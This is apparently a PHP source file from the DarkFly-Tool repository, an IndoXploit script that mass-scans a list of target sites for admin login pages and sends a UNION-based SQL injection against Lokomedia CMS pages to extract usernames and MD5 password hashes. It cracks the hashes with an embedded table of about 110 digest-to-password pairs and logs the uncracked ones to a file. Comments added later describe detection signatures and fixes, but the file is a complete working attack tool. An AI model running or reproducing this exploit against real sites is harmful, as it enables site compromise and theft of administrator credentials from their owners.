GitHub Repository: Ranginang67/DarkFly-Tool
Path: blob/master/lib/lokmed.php
<?php
// Remove PHP's execution time limit: the script below loops over every line of
// the target file and issues many HTTP requests per line.
set_time_limit(0);
// Silence all PHP diagnostics for the whole run, so nothing but the script's own
// print statements reaches the terminal.
error_reporting(0);

// Lokomedia (SQL Injection) + Auto Scan Admin Login
// enjoyyyy
// Coded by Mr. Error 404 (l0c4lh34rtz) - IndoXploit - Sanjungan Jiwa
// greetz: res7ock crew - j*ncok Sec
// usage: php namafile.php target.txt   (namafile = the name of this script file)

// Please do not change the copyright notice if you want to be respected ^^
/**
 * Print the tool's banner (title, author credits, usage line) to standard
 * output, framed by a rule line above and below and followed by a blank line.
 */
function cover() {
    $rule = '[ =========================================================================== ]';
    $bannerLines = array(
        $rule,
        ' --> Lokomedia (SQL Injection) + Auto Scan Admin Login <--',
        ' ## Coded by Mr. Error 404 (l0c4lh34rtz) - IndoXploit - Sanjungan Jiwa ##',
        ' # greetz: res7ock crew - j*ncok Sec #',
        '+++++++ usage: php namafile.php target.txt +++++++',
        $rule,
    );
    // Every line ends with one newline; the closing rule is followed by two.
    echo implode("\n", $bannerLines) . "\n\n";
}
/**
 * Issue an HTTP GET for $url with cURL and hand back the result.
 *
 * Redirects are followed and the body is returned instead of being echoed.
 * No timeout, header or TLS option is set here, so libcurl defaults apply.
 *
 * @param string $url address to request
 * @return mixed whatever curl_exec() returns: the response body on success,
 *               false on a transfer failure
 */
function ngcurl($url) {
    $handle = curl_init($url);
    curl_setopt_array($handle, array(
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
    ));
    $body = curl_exec($handle);
    curl_close($handle);
    return $body;
}
/**
 * Append one line of text to md5.txt in the current working directory.
 *
 * The main loop calls this with password digests it could not map to a
 * plaintext, so the file accumulates harvested hashes across runs.
 *
 * @param string $isi text to record; a trailing newline is added
 */
function simpen($isi) {
    $log = fopen("md5.txt", "a+");
    fwrite($log, $isi . "\n");
    fclose($log);
}
// Relative paths that the main loop requests under each target's base URL, in
// this order, while looking for an administrator login page; it stops at the
// first response that looks like a login form. A few entries repeat.
//
// Seen from the server side this is a rapid run of requests for mostly
// non-existent admin paths from a single client. Alerting on 404 bursts and
// rate-limiting per client catch it; an unusual admin directory name is not an
// access control and does not replace authentication hardening.
$admin = [
    'adm/',
    '_adm_/',
    '_admin_/',
    '_administrator_/',
    'operator/',
    'sika/',
    'develop/',
    'ketua/',
    'redaktur/',
    'author',
    'admin/',
    'administrator/',
    'adminweb/',
    'user/',
    'users/',
    'dinkesadmin/',
    'retel/',
    'author/',
    'panel/',
    'paneladmin/',
    'panellogin/',
    'redaksi/',
    'cp-admin/',
    'master/',
    'master/index.php',
    'master/login.php',
    'operator/index.php',
    'sika/index.php',
    'develop/index.php',
    'ketua/index.php',
    'redaktur/index.php',
    'admin/index.php',
    'administrator/index.php',
    'adminweb/index.php',
    'user/index.php',
    'users/index.php',
    'dinkesadmin/index.php',
    'retel/index.php',
    'author/index.php',
    'panel/index.php',
    'paneladmin/index.php',
    'panellogin/index.php',
    'redaksi/index.php',
    'cp-admin/index.php',
    'operator/login.php',
    'sika/login.php',
    'develop/login.php',
    'ketua/login.php',
    'redaktur/login.php',
    'admin/login.php',
    'administrator/login.php',
    'adminweb/login.php',
    'user/login.php',
    'users/login.php',
    'dinkesadmin/login.php',
    'retel/login.php',
    'author/login.php',
    'panel/login.php',
    'paneladmin/login.php',
    'panellogin/login.php',
    'redaksi/login.php',
    'cp-admin/login.php',
    'terasadmin/',
    'terasadmin/index.php',
    'terasadmin/login.php',
    'rahasia/',
    'rahasia/index.php',
    'rahasia/admin.php',
    'rahasia/login.php',
    'dinkesadmin/',
    'dinkesadmin/login.php',
    'adminpmb/',
    'adminpmb/index.php',
    'adminpmb/login.php',
    'system/',
    'system/index.php',
    'system/login.php',
    'webadmin/',
    'webadmin/index.php',
    'webadmin/login.php',
    'wpanel/',
    'wpanel/index.php',
    'wpanel/login.php',
    'adminpanel/index.php',
    'adminpanel/',
    'adminpanel/login.php',
    'adminkec/',
    'adminkec/index.php',
    'adminkec/login.php',
    'admindesa/',
    'admindesa/index.php',
    'admindesa/login.php',
    'adminkota/',
    'adminkota/index.php',
    'adminkota/login.php',
    'admin123/',
    'admin123/index.php',
    'admin123/login.php',
    'logout/',
    'logout/index.php',
    'logout/login.php',
    'logout/admin.php',
    'adminweb_setting',
];
// Lookup table: 32-character hex digest => the plaintext shown for it. The keys
// are unsalted MD5 digests of the listed passwords (for example
// 5f4dcc3b5aa765d61d8327deb882cf99 is md5("password")). The main loop indexes
// this table with the password column value it reads from a target and prints
// the plaintext; a digest that is not listed is printed as-is and appended to
// md5.txt by simpen().
//
// Several keys occur more than once. PHP keeps the last value for a repeated
// key, and the repeats here carry the same plaintext, so they have no effect.
//
// For defenders: a table like this is why unsalted MD5 gives no protection to
// common or reused passwords -- recovering them is a single array lookup.
// Store passwords with password_hash() / password_verify(), and treat any
// account whose stored digest appears below as compromised and due for reset.
$real_pass = array(
    "a66abb5684c45962d887564f08346e8d" => "admin123456",
    "99026ab4ab3de96f3d7ae33c8c85057b" => "master!@#$qwe",
    "c630643500720b255abb22e2ab2c31f6" => "sumedang123",
    "1c63129ae9db9c60c3e8aa94d3e00495" => "1qaz2wsx",
    "f243df64be7184fb0fc07bd6cf53185b" => "b1smillah",
    "93261ae77f0df5522dd9767203f3aa17" => "house69",
    "f243df64be7184fb0fc07bd6cf53185b" => "b1smillah",
    "37c77ada62ec68d1b740717fc886bef6" => "Suk4bum1",
    "d39b59b946b414c4e5926f9c7b23840a" => "kasitaugakya",
    "fbff29af096fa646757ce8439b644714" => "vro190588",
    "1feadc10e93f2b64c65868132f1e72d3" => "agoes",
    "0192023a7bbd73250516f069df18b500" => "admin123",
    "7aa1dfee8619ac8f282e296d83eb55ff" => "meong",
    "24fa5ee2c1285e115dd6b5fe1c25a333" => "773062",
    "d557fd4686821b5d8b927cdfe6e67d21" => "#admin#",
    "5fec4ba8376f207d1ff2f0cac0882b01" => "admin!@#",
    "a01726b559eeeb5fc287bf0098a22f6c" => "@dm1n",
    "73acd9a5972130b75066c82595a1fae3" => "ADMIN",
    "511f2efed0e465e700a951f2f1ecec19" => "bs1unt46",
    "7b7bc2512ee1fedcd76bdc68926d4f7b" => "Administrator",
    "99fedb09f0f5da90e577784e5f9fdc23" => "ADMINISTRATOR",
    "e58bfd635502ea963e1d52487ac2edfa" => "!@#123!@#123",
    "5449ccea16d1cc73990727cd835e45b5" => "ngadimin",
    "c21f969b5f03d33d43e04f8f136e7682" => "default",
    "1a1dc91c907325c69271ddf0c944bc72" => "pass",
    "fffdf0489f264598e9d35cba0381e9ac" => "sukmapts",
    "5f4dcc3b5aa765d61d8327deb882cf99" => "password",
    "5ebe2294ecd0e0f08eab7690d2a6ee69" => "secret",
    "c893bad68927b457dbed39460e6afd62" => "prueba",
    "b2ca9cfa6067282a031d28a54886822d" => "admin4343",
    "3a3795bb61d5377545b4f345ff223e3d" => "bingo",
    "e172dd95f4feb21412a692e73929961e" => "bismillah",
    "8221303fbf816fd9da96be7dd4c92f99" => "salawarhandap123",
    "0570e3795fbe97ddd3ce53be141d1aed" => "indoxploit",
    "098f6bcd4621d373cade4e832627b4f6" => "test",
    "976adc43eaf39b180d9f2c624a1712cd" => "adminppcp",
    "5985609a2dc01098797c94a43e0a1115" => "masarief",
    "21232f297a57a5a743894a0e4a801fc3" => "admin",
    "1870a829d9bc69abf500eca6f00241fe" => "wordpress",
    "126ac9f6149081eb0e97c2e939eaad52" => "blog",
    "fe01ce2a7fbac8fafaed7c982a04e229" => "demo",
    "04e484000489dd3b3fb25f9aa65305c6" => "redaksi2016",
    "91f5167c34c400758115c2a6826ec2e3" => "administrador",
    "200ceb26807d6bf99fd6f4f0d1ca54d4" => "administrator",
    "c93ccd78b2076528346216b3b2f701e6" => "admin1234",
    "912ec803b2ce49e4a541068d495ab570" => "asdf",
    "1adbb3178591fd5bb0c248518f39bf6d" => "asdf1234",
    "e99a18c428cb38d5f260853678922e03" => "abc123",
    "a152e841783914146e4bcd4f39100686" => "asdfgh",
    "a384b6463fc216a5f8ecb6670f86456a" => "qwert",
    "d8578edf8458ce06fbc5bb76a58c5ca4" => "qwerty",
    "b59c67bf196a4758191e42f76670ceba" => "1111",
    "96e79218965eb72c92a549dd5a330112" => "111111",
    "4297f44b13955235245b2497399d7a93" => "123123",
    "c33367701511b4f6020ec61ded352059" => "654321",
    "81dc9bdb52d04dc20036dbd8313ed055" => "1234",
    "e10adc3949ba59abbe56e057f20f883e" => "123456",
    "fcea920f7412b5da7be0cf42b8c93759" => "1234567",
    "25d55ad283aa400af464c76d713c07ad" => "12345678",
    "25f9e794323b453885f5181f1b624d0b" => "123456789",
    "e807f1fcf82d132f9bb018ca6738a19f" => "1234567890",
    "befe9f8a14346e3e52c762f333395796" => "qawsed",
    "76419c58730d9f35de7ac538c2fd6737" => "qazwsx",
    "5f4dcc3b5aa765d61d8327deb882cf99" => "password",
    "bed128365216c019988915ed3add75fb" => "passw0rd",
    "21232f297a57a5a743894a0e4a801fc3" => "admin",
    "e10adc3949ba59abbe56e057f20f883e" => "123456",
    "5f4dcc3b5aa765d61d8327deb882cf99" => "password",
    "25d55ad283aa400af464c76d713c07ad" => "12345678",
    "f379eaf3c831b04de153469d1bec345e" => "666666",
    "96e79218965eb72c92a549dd5a330112" => "111111",
    "fcea920f7412b5da7be0cf42b8c93759" => "1234567",
    "d8578edf8458ce06fbc5bb76a58c5ca4" => "qwerty",
    "6f3cac6213ffceee27cc85414f458caa" => "siteadmin",
    "200ceb26807d6bf99fd6f4f0d1ca54d4" => "administrator",
    "63a9f0ea7bb98050796b649e85481845" => "root",
    "4297f44b13955235245b2497399d7a93" => "123123",
    "c8837b23ff8aaa8a2dde915473ce0991" => "123321",
    "e807f1fcf82d132f9bb018ca6738a19f" => "1234567890",
    "4ca7c5c27c2314eecc71f67501abb724" => "letmein123",
    "cc03e747a6afbbcbf8be7668acfebee5" => "test123",
    "62cc2d8b4bf2d8728120d052163a77df" => "demo123",
    "32250170a0dca92d53ec9624f336ca24" => "pass123",
    "46f94c8de14fb36680850768ff1b7f2a" => "123qwe",
    "200820e3227815ed1756a6b531e7e0d2" => "qwe123",
    "c33367701511b4f6020ec61ded352059" => "654321",
    "f74a10e1d6b2f32a47b8bcb53dac5345" => "loveyou",
    "172eee54aa664e9dd0536b063796e54e" => "adminadmin123",
    "e924e336dcc4126334c852eb8fadd334" => "waskita1234",
    "02631cc1d0cc5bda188566e90d0ae16c" => "rsamku2013",
    "b69cbef044eac6fc514a2988e62c5b30" => "unlock08804",
    "12e110a1b89da9b09a191f1f9b0a1398" => "nalaratih",
    "f70d32432ff0a8984b5aadeb159f9db6" => "Much240316",
    "a2fffa77aa0dde8cd4c416b5114eba21" => "gondola",
    "2b45af95ce316ea4cffd2ce4093a2b83" => "w4nd3szaki",
    "c5612a125d8613ddae79a6b36c8bee37" => "Reddevil#21",
    "6e7fbe8e6147e2c430ce7e8ab883e533" => "R4nd0m?!",
    "5136850b6c8f3ebc66122188347efda0" => "adminku",
    "5214905fbe8d7f0bb0d0a328f08af3f0" => "adminpust4k4",
    "acfc976c2d22e4a595a9ee6fc0d05f27" => "dikmen2016",
    "dcdee606657b5f7d8b218badfeb22a90" => "masputradmin",
    "ecb4208ee41389259a632d3a733c2786" => "741908",
    "827ccb0eea8a706c4c34a16891f84e7b" => "12345",
    "855be097acdf2fea4e342615a154ca3c" => "tolol",
    "eeee80342778e7b497d507f89094b10d" => "master10",
    "d29c0398602e6cf005f0dcb7a0443c7d" => "adminjalan",
    "9062756924cf10763cc89cf2793a77ab" => "pass4@nd1",
    "8b6bc5d8046c8466359d3ac43ce362ab" => "ganteng",
    "528d06a172eb2d8fab4e93f33f3986a8" => "jasindolive",
    "058fe7f85df1e992ef7bf948f1db7842" => "404J",
    "abe1f4492f922a9111317ed7f7f8e723" => "bantarjati5",
);
// Script body. Reads newline-separated targets from the file named by the first
// command-line argument and, for each one:
//   1. fetches the home page and looks for Lokomedia-style links,
//   2. requests the paths in $admin until one looks like a login page,
//   3. sends one UNION-based SQL injection request and prints whatever
//      username / password pair the response reflects.
//
// What this looks like from the defending side (all taken from the code below):
//   - a request path containing MySQL versioned comments (/*!50000 ... */)
//     wrapped around UNION, SELECT and CONCAT in mixed case, together with the
//     hex literal 0x696e646f78706c6f6974 (ASCII "indoxploit") used as a marker;
//   - a run of requests for admin paths from the same client just before it.
// Both are straightforward to match in access logs or a WAF rule. The durable
// fix is in the application: bind the id taken from statis-/kategori-/berita-
// URLs as a query parameter instead of concatenating it into SQL, and store
// passwords with password_hash() rather than as MD5 digests.

// One target per line of the input file.
$sites = explode("\n", file_get_contents($argv[1]));
if(isset($argv[1])) {
    cover();
    foreach($sites as $url) {
        // Default to plain http:// when the line carries no scheme.
        if(!preg_match("/^http:\/\//", $url) AND !preg_match("/^https:\/\//", $url)) {
            $url = "http://$url";
        } else {
            $url = $url;
        }
        $statis = "";
        $sisa = "";
        $login = "";
        // URL prefixes of the Lokomedia pages this script goes after.
        $param_list = array("statis","kategori","berita");
        // Baseline copy of the home page; compared with the injected response below.
        $curl = ngcurl($url);
        // Normalise quotes so the link pattern, which expects a closing double
        // quote, matches either attribute style.
        $curl = str_replace("'", '"', $curl);
        foreach($param_list as $param) {
            // Collect the text that follows "<param>-" in links on the home page.
            preg_match_all("/$param-(.*?)\">/", $curl, $id);
            foreach($id[1] as $stat) {
                // Only the first match is used: its first "-"-separated segment
                // goes into $statis and its second into $sisa (presumably the
                // numeric id and the start of the slug -- confirm against a
                // Lokomedia URL).
                $pecah = explode("-", $stat);
                $statis .= $pecah[0];
                $sisa .= $pecah[1];
                break;
            }
            // Admin-page probe: a response counts as a login page when it
            // mentions administrator/username/password and none of the listed
            // error words or status numbers. The first hit is kept.
            foreach($admin as $adminweb) {
                $curl_admin = ngcurl("$url/$adminweb");
                if(preg_match("/administrator|username|password/i", $curl_admin) AND !preg_match("/not found|forbidden|404|403|500/i", $curl_admin)) {
                    $login .= "$url/$adminweb";
                    break;
                }
            }
            // The injection request. A single quote is appended to the id,
            // followed by a UNION SELECT of CONCAT(marker, "<li>", username,
            // " ", password, "<li>") from table `users`; 0x3c6c693e is "<li>"
            // and 0x20 is a space. This string is the signature to alert on.
            $sql = ngcurl("$url/$param-$statis'/*!50000UniON*/+/*!50000SeLeCT*/+/*!50000cOnCAt*/(0x696e646f78706c6f6974,0x3c6c693e,username,0x20,password,0x3c6c693e)+from+users--+---+-$sisa");
            // The injected row is expected to be reflected in the page's
            // <meta name="description"> tag; take the text between the two
            // "<li>" markers and split it into username and password digest.
            preg_match("/<meta name=\"description\" content=\"(.*?)\">/", $sql, $up);
            preg_match("/<li>(.*)<li>/", $up[1], $akun);
            $data = explode(" ", $akun[1]);
            print "[+] URL: $url\n";
            //print "[+] param: $param\n";
            // Report a result only when the response differs from the baseline
            // page and contains the marker string.
            if(htmlspecialchars($curl) !== htmlspecialchars($sql)) {
                if(preg_match("/indoxploit/", $sql)) {
                    //print "[ Injection Successfully ]\n";
                    if($data[0] == "" || $data[1] == "") {
                        print "[+] Not Injected :(\n\n";
                        break;
                    } else {
                        print "[+] username: ".$data[0]."\n";
                        // Map the digest to a plaintext via $real_pass; a digest
                        // that is not listed is printed raw and appended to md5.txt.
                        $passwd = $real_pass[$data[1]];
                        if($passwd == "") {
                            $passwd = $data[1];
                            simpen($data[1]);
                        }
                        print "[+] password: $passwd\n";
                    }
                    // "Login Admin ga ketemu" is Indonesian for "admin login not found".
                    if($login == "") {
                        print "[+] Login Admin ga ketemu :(\n\n";
                    } else {
                        print "[+] Login: $login\n\n";
                    }
                    break;
                } else {
                    print "[+] Not Injected :(\n\n";
                    break;
                }
            } else {
                print "[+] Not Injected :(\n\n";
                break;
            }
        }
    }
} else {
    print "usage: php ".$argv[0]." target.txt\n";
}
?>